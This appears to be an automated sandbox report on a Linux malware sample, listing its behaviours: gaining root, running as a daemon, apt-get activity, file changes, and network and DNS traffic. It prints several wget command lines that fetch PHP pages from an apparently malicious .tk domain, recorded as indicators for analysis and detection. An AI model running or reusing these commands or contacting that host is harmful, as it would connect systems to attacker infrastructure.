Technical Information
Malicious functions:
Gains root privileges
Launches itself as a daemon
Launches processes:
- /bin/sh <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/sh <SAMPLE_FULL_PATH> -c
- wget specialdepo.tk/sistem/duyuru.php -q -O -
- wget specialdepo.tk/sistem/tarih.php -q -O -
- wget specialdepo.tk/panel/ban/.php -q -O -
- wget specialdepo.tk/sistem/mesaj.php -q -O -
- wget specialdepo.tk/Special/sinalfalink.php -q -O -
- wget specialdepo.tk/Special/liblink.php -q -O -
- clear
- grep ^NAME
- grep CentOS
- cat /etc/os-release
- apt-get update -y
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- /usr/lib/apt/methods/gpgv
- /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.gp7lXl /tmp/apt.data.TZ8SMM
- /usr/lib/apt/methods/gzip
- /usr/lib/apt/methods/bzip2
- /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.SXPnwv /tmp/apt.data.DGhTRY
- apt-get install curl -y
Kills the following processes:
- /usr/lib/apt/methods/http
- /usr/lib/apt/methods/gpgv
- /usr/lib/apt/methods/gzip
- /usr/lib/apt/methods/bzip2
Performs operations with the file system:
Modifies file access rights:
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_source_Sources.gz.decomp.BG76RK
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_main_source_Sources
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_binary-amd64_Packages.gz.decomp.Z9wrbh
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_main_binary-amd64_Packages
- /var/cache/apt/pkgcache.bin.XAuj4C
Creates or modifies files:
- /var/lib/apt/lists/lock
- /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
- /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_InRelease
- /tmp/apt.sig.gp7lXl
- /tmp/apt.data.TZ8SMM
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release
- /tmp/fileutl.message.5lCQf7
- /tmp/fileutl.message.5lCQf7 (deleted)
- /tmp/apt.sig.SXPnwv
- /tmp/apt.data.DGhTRY
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_source_Sources.gz
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_source_Sources.gz.decomp.BG76RK
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_binary-amd64_Packages.gz
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_source_Sources.gz.decomp
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_binary-amd64_Packages.gz.decomp.Z9wrbh
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_binary-amd64_Packages.gz.decomp
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_i18n_Translation-en.bz2
- /var/lib/dpkg/lock
- /var/cache/apt/pkgcache.bin.XAuj4C
Deletes files:
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
- /tmp/apt.sig.gp7lXl
- /tmp/apt.data.TZ8SMM
- /tmp/fileutl.message.5lCQf7
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_source_Sources
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_binary-amd64_Packages
- /tmp/apt.sig.SXPnwv
- /tmp/apt.data.DGhTRY
- /var/cache/apt/pkgcache.bin
- /var/cache/apt/srcpkgcache.bin
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
- 21#.##6.149.233:80
- 21#.##1.132.250:80
- 12#.#1.0.63:80
- 12#.##1.240.215:80
- 20#.##.202.197:80
- 12#.##.240.73:80
- [2#######8:dc41:100::233]:80
- [2#########:1:216:35ff:fe7f:6ceb]:80
- [2#####e42:14::204]:80
HTTP GET requests:
- sp########o.tk/sistem/duyuru.php
- sp#######po.tk/sistem/tarih.php
- sp#######po.tk/panel/ban/.php
- sp#######po.tk/sistem/mesaj.php
- sp#########.tk/Special/sinalfalink.php
- sp########o.tk/Special/liblink.php
- ft#.##.######.org/debian/dists/jessie/InRelease
- se######.#####n.org/dists/jessie/updates/InRelease
- ft#.##.######.#rg/debian/dists/jessie-updates/InRelease
- se##########.##bian.org/dists/jessie/updates/InRelease
- ft#.##.######.org/debian/dists/jessie/Release.gpg
- ft#.##.######.org/debian/dists/jessie/Release
- ft#.##.######.#####ebian/dists/jessie-updates/main/source/Sources.gz
- ft#.##.######.######bian/dists/jessie-updates/main/binary-amd64/Packages.gz
- ft#.##.######.######bian/dists/jessie-updates/main/i18n/Translation-en.bz2
DNS ASK:
- sp###aldepo.tk
- ft#.##.debian.org
- se####ty.debian.org
- se#####y-cdn.debian.org
Other:
Collects RAM information
